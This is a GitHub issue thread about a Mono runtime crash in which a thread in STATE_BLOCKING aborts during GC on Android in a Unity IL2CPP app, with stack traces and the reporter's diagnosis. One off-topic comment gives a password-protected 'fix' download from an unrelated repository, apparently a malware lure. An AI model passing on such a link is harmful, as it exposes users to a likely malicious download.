### ISSUE TITLE
[mono crash] mono runtime is crashing when new an object and mono main thread is in STATE_Blocking

### ISSUE THREAD

**Issue by monkeykane** [dotnet/runtime#107122]
### Description

When a new dotnet object has been created in mono runtime, e.g "String", It will be caused GC check, but at the same moment, mono main thread in STATE_Blocking, then App has crashed.
Crash message as follow
”Cannot transition thread 0x75e0c12cb0 from STATE_BLOCKING with DO_BLOCKING“

### Reproduction Steps

This is not a consistently reproducible crash issue, but here we can provide a call stack information at the time of the crash.
```
libmonosgen-2.0.so	monoeg_assert_abort
libmonosgen-2.0.so	[inline]monoeg_g_logstr
libmonosgen-2.0.so	monoeg_g_logv_nofree
libmonosgen-2.0.so	[inline]monoeg_g_logv 
libmonosgen-2.0.so	monoeg_g_log
libmonosgen-2.0.so	mono_threads_transition_do_blocking
libmonosgen-2.0.so	mono_threads_enter_gc_safe_region_unbalanced_with_info
libmonosgen-2.0.so	mono_thread_info_suspend_lock_with_info
libmonosgen-2.0.so	acquire_gc_locks
libmonosgen-2.0.so	sgen_client_stop_world
libmonosgen-2.0.so	sgen_stop_world
libmonosgen-2.0.so	[inline]sgen_perform_collection_inner
libmonosgen-2.0.so	sgen_perform_collection
libmonosgen-2.0.so	sgen_ensure_free_space
libmonosgen-2.0.so	sgen_alloc_obj_nolock
libmonosgen-2.0.so	mono_gc_alloc_string
DotnetModule	        (wrapper alloc) object:AllocString (intptr,int)
DotnetModule	        System.Exception:ToString ()
```

### Expected behavior

The App runs smoothly without crashing, and is able to create new objects normally.

### Actual behavior

App crashed in mono runtime.

### Regression?

NO

### Configuration

- NET Version 10 or 11 (.Net SDK 8.0)
- Android
- ARM64
- JIT mode

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ivanpovazan** [comment]
Hello @monkeykane, 

Could you please provide more information about your project? 
For example:
- Is this a MAUI or Xamarin Android app?
- Which target framework version are you targeting?
- Does this happen on emulator or on physical device?

Additionally, if possible, if you could share a repro project or a sample code with which you are able to reproduce the crash.

**Comment by monkeykane** [comment]
Hallo @ivanpovazan 

The information as follow
- we use .dotnet mono runtime in Unity ( it is not Unity Mono) and then build Unity Android app
- target framework:  .NET 8.0
- It happens on physical device.

Sorry for no more sample code. it crashes quite randomly.

There is an other case:
when `mono_object_to_string` has been invoked, there should create a new MonoString, then app crashed as same reason.
```
0x0000000000153b94 libmonosgen-2.0.so	monoeg_assert_abort/home/user/dotnetruntime/src/mono/mono/eglib/goutput.c:57
0x0000000000153f5c libmonosgen-2.0.so	[inline]monoeg_g_logstr /home/user/dotnetruntime/src/mono/mono/eglib/goutput.c:148
0x0000000000153f5c libmonosgen-2.0.so	monoeg_g_logv_nofree/home/user/dotnetruntime/src/mono/mono/eglib/goutput.c:166
0x0000000000153fe4 libmonosgen-2.0.so	[inline]monoeg_g_logv /home/user/dotnetruntime/src/mono/mono/eglib/goutput.c:173
0x0000000000153fe4 libmonosgen-2.0.so	monoeg_g_log/home/user/dotnetruntime/src/mono/mono/eglib/goutput.c:182
0x0000000000170fe8 libmonosgen-2.0.so	mono_threads_transition_do_blocking/home/user/dotnetruntime/src/mono/mono/utils/mono-threads-state-machine.c:759
0x00000000001727dc libmonosgen-2.0.so	mono_threads_enter_gc_safe_region_unbalanced_with_info/home/user/dotnetruntime/src/mono/mono/utils/mono-threads-coop.c:324
0x00000000001b9028 libmonosgen-2.0.so	[inline]mono_os_mutex_trylock /home/user/dotnetruntime/src/mono/mono/utils/mono-os-mutex.h:115
0x00000000001b9028 libmonosgen-2.0.so	[inline]mono_coop_mutex_lock /home/user/dotnetruntime/src/mono/mono/utils/mono-coop-mutex.h:52
0x00000000001b9028 libmonosgen-2.0.so	mono_loader_lock/home/user/dotnetruntime/src/mono/mono/metadata/loader.c:140
0x000000000018b0a0 libmonosgen-2.0.so	mono_class_create_from_typedef/home/user/dotnetruntime/src/mono/mono/metadata/class-init.c:486
0x00000000001833b4 libmonosgen-2.0.so	mono_class_get_checked/home/user/dotnetruntime/src/mono/mono/metadata/class.c:2925
0x00000000001cd7e4 libmonosgen-2.0.so	[inline]mono_metadata_decode_value /home/user/dotnetruntime/src/mono/mono/metadata/metadata.c:1546
0x00000000001cd7e4 libmonosgen-2.0.so	[inline]mono_metadata_parse_typedef_or_ref /home/user/dotnetruntime/src/mono/mono/metadata/metadata.c:1689
0x00000000001cd7e4 libmonosgen-2.0.so	[inline]do_mono_metadata_parse_type /home/user/dotnetruntime/src/mono/mono/metadata/metadata.c:4042
0x00000000001cd7e4 libmonosgen-2.0.so	[inline]do_mono_metadata_parse_type_with_cmods /home/user/dotnetruntime/src/mono/mono/metadata/metadata.c:2151
0x00000000001cd7e4 libmonosgen-2.0.so	mono_metadata_parse_type_internal/home/user/dotnetruntime/src/mono/mono/metadata/metadata.c:2233
0x00000000001d57b8 libmonosgen-2.0.so	[inline]mono_metadata_parse_type_checked /home/user/dotnetruntime/src/mono/mono/metadata/metadata.c:2265
0x00000000001d57b8 libmonosgen-2.0.so	do_mono_metadata_parse_generic_class/home/user/dotnetruntime/src/mono/mono/metadata/metadata.c:3660
0x00000000001cd640 libmonosgen-2.0.so	[inline]mono_metadata_decode_value /home/user/dotnetruntime/src/mono/mono/metadata/metadata.c:1546
0x00000000001cd640 libmonosgen-2.0.so	[inline]mono_metadata_parse_typedef_or_ref /home/user/dotnetruntime/src/mono/mono/metadata/metadata.c:1689
0x00000000001cd640 libmonosgen-2.0.so	[inline]do_mono_metadata_parse_type /home/user/dotnetruntime/src/mono/mono/metadata/metadata.c:4042
0x00000000001cd640 libmonosgen-2.0.so	[inline]do_mono_metadata_parse_type_with_cmods /home/user/dotnetruntime/src/mono/mono/metadata/metadata.c:2151
0x00000000001cd640 libmonosgen-2.0.so	mono_metadata_parse_type_internal/home/user/dotnetruntime/src/mono/mono/metadata/metadata.c:2233
0x00000000001ce19c libmonosgen-2.0.so	[inline]mono_metadata_parse_type_checked /home/user/dotnetruntime/src/mono/mono/metadata/metadata.c:2265
0x00000000001ce19c libmonosgen-2.0.so	mono_metadata_parse_method_signature_full/home/user/dotnetruntime/src/mono/mono/metadata/metadata.c:2717
0x00000000001bb308 libmonosgen-2.0.so	mono_method_signature_checked_slow/home/user/dotnetruntime/src/mono/mono/metadata/loader.c:1854
0x00000000001bb518 libmonosgen-2.0.so	[inline]mono_method_signature_checked /home/user/dotnetruntime/src/mono/mono/metadata/class-internals.h:773
0x00000000001bb518 libmonosgen-2.0.so	mono_method_signature_internal_slow/home/user/dotnetruntime/src/mono/mono/metadata/loader.c:1944
0x0000000000055084 libmonosgen-2.0.so	[inline]mono_method_signature_internal /home/user/dotnetruntime/src/mono/mono/metadata/class-internals.h:785
0x0000000000055084 libmonosgen-2.0.so	mono_method_to_ir/home/user/dotnetruntime/src/mono/mono/mini/method-to-ir.c:7686
0x0000000000035354 libmonosgen-2.0.so	mini_method_compile/home/user/dotnetruntime/src/mono/mono/mini/mini.c:3498
0x00000000000379f0 libmonosgen-2.0.so	mono_jit_compile_method_inner/home/user/dotnetruntime/src/mono/mono/mini/mini.c:4132
0x000000000003c6c0 libmonosgen-2.0.so	[inline]jit_compile_method_with_opt_cb /home/user/dotnetruntime/src/mono/mono/mini/mini-runtime.c:2868
0x000000000003c6c0 libmonosgen-2.0.so	jit_compile_method_with_opt/home/user/dotnetruntime/src/mono/mono/mini/mini-runtime.c:2884
0x00000000000402a8 libmonosgen-2.0.so	[inline]mono_jit_compile_method_jit_only /home/user/dotnetruntime/src/mono/mono/mini/mini-runtime.c:2917
0x00000000000402a8 libmonosgen-2.0.so	mono_jit_runtime_invoke/home/user/dotnetruntime/src/mono/mono/mini/mini-runtime.c:3514
0x00000000001de01c libmonosgen-2.0.so	[inline]do_runtime_invoke /home/user/dotnetruntime/src/mono/mono/metadata/object.c:2536
0x00000000001de01c libmonosgen-2.0.so	mono_runtime_try_invoke/home/user/dotnetruntime/src/mono/mono/metadata/object.c:2699
0x00000000001e9668 libmonosgen-2.0.so	mono_object_to_string/home/user/dotnetruntime/src/mono/mono/metadata/object.c:7716
0x0000000002978db4 libil2cpp.so	        MonoDll_mono_object_to_string_m7A57D6739F8CE826EA0275A7A7B2C2827A1B4E92D
```

**Comment by monkeykane** [comment]
Here we have identified a typical case, 90% of the crash issues are caused by System.Exception:ToString(). This crash is triggered when dotnet code handles exceptions
```
0x000000746641df18 DotnetModule	(wrapper managed-to-native) System.Reflection.CustomAttribute:GetCustomAttributesInternal (System.Reflection.ICustomAttributeProvider,System.Type,bool)
0x000000746641dd48 DotnetModule	System.Reflection.CustomAttribute:GetCustomAttributesBase (System.Reflection.ICustomAttributeProvider,System.Type,bool)
0x000000746641c950 DotnetModule	System.Reflection.CustomAttribute:GetCustomAttributes (System.Reflection.ICustomAttributeProvider,System.Type,bool)
0x000000746641c808 DotnetModule	System.Attribute:GetCustomAttributes (System.Reflection.MemberInfo,System.Type,bool)
0x000000765a9f96c8 DotnetModule	System.Diagnostics.StackTrace:TryResolveStateMachineMethod (System.Reflection.MethodBase&,System.Type&)
0x000000765a9f7538 DotnetModule	System.Diagnostics.StackTrace:ToString (System.Diagnostics.StackTrace/TraceFormat,System.Text.StringBuilder)
0x000000765a9f7438 DotnetModule	System.Diagnostics.StackTrace:ToString (System.Diagnostics.StackTrace/TraceFormat)
0x000000765a9f6d90 DotnetModule	System.Exception:GetStackTrace ()
0x000000765a9f6c20 DotnetModule	System.Exception:get_StackTrace ()
0x000000765a9f6000 DotnetModule	System.Exception:ToString ()
0x00000075d45eed98 DotnetModule	(wrapper runtime-invoke) <Module>:runtime_invoke_object__this__ (object,intptr,intptr,intptr)
```

**Comment by ivanpovazan** [comment]
Correct me if I am wrong, but from what you shared it seems like you are creating an app with Unity that uses IL2CPP backend, but at the same time references an Android library which was built with Mono ?

**Comment by monkeykane** [comment]
> Correct me if I am wrong, but from what you shared it seems like you are creating an app with Unity that uses IL2CPP backend, but at the same time references an Android library which was built with Mono ?

Hi @ivanpovazan 

Ya, we use il2cpp backend in Unity and also use libmono-sgen.so as other backend to execute managed codes ( JIT in Android )

**Comment by ivanpovazan** [comment]
Thank you, but I am still uncertain how your configuration looks like and it is hard to tell what the problem could be without more details about it.

Could you please explain in more details the following:
> and also use libmono-sgen.so as other backend to execute managed codes ( JIT in Android )

**Comment by monkeykane** [comment]
Hi @ivanpovazan 
After debugging, we identified that the issue is caused by the invoke of `mono_object_to_string`. When `mono_object_to_string` is invoked via P/Invoke, the Mono main thread enters `STATE_Blocking`. If `mono_runtime_try_invoke` triggers GC at this point, the crash occurs. However, this is not a 100% reproducible situation, it only happens when GC is triggered.

Now that we have identified the issue, we have managed to bypass it using other solution.
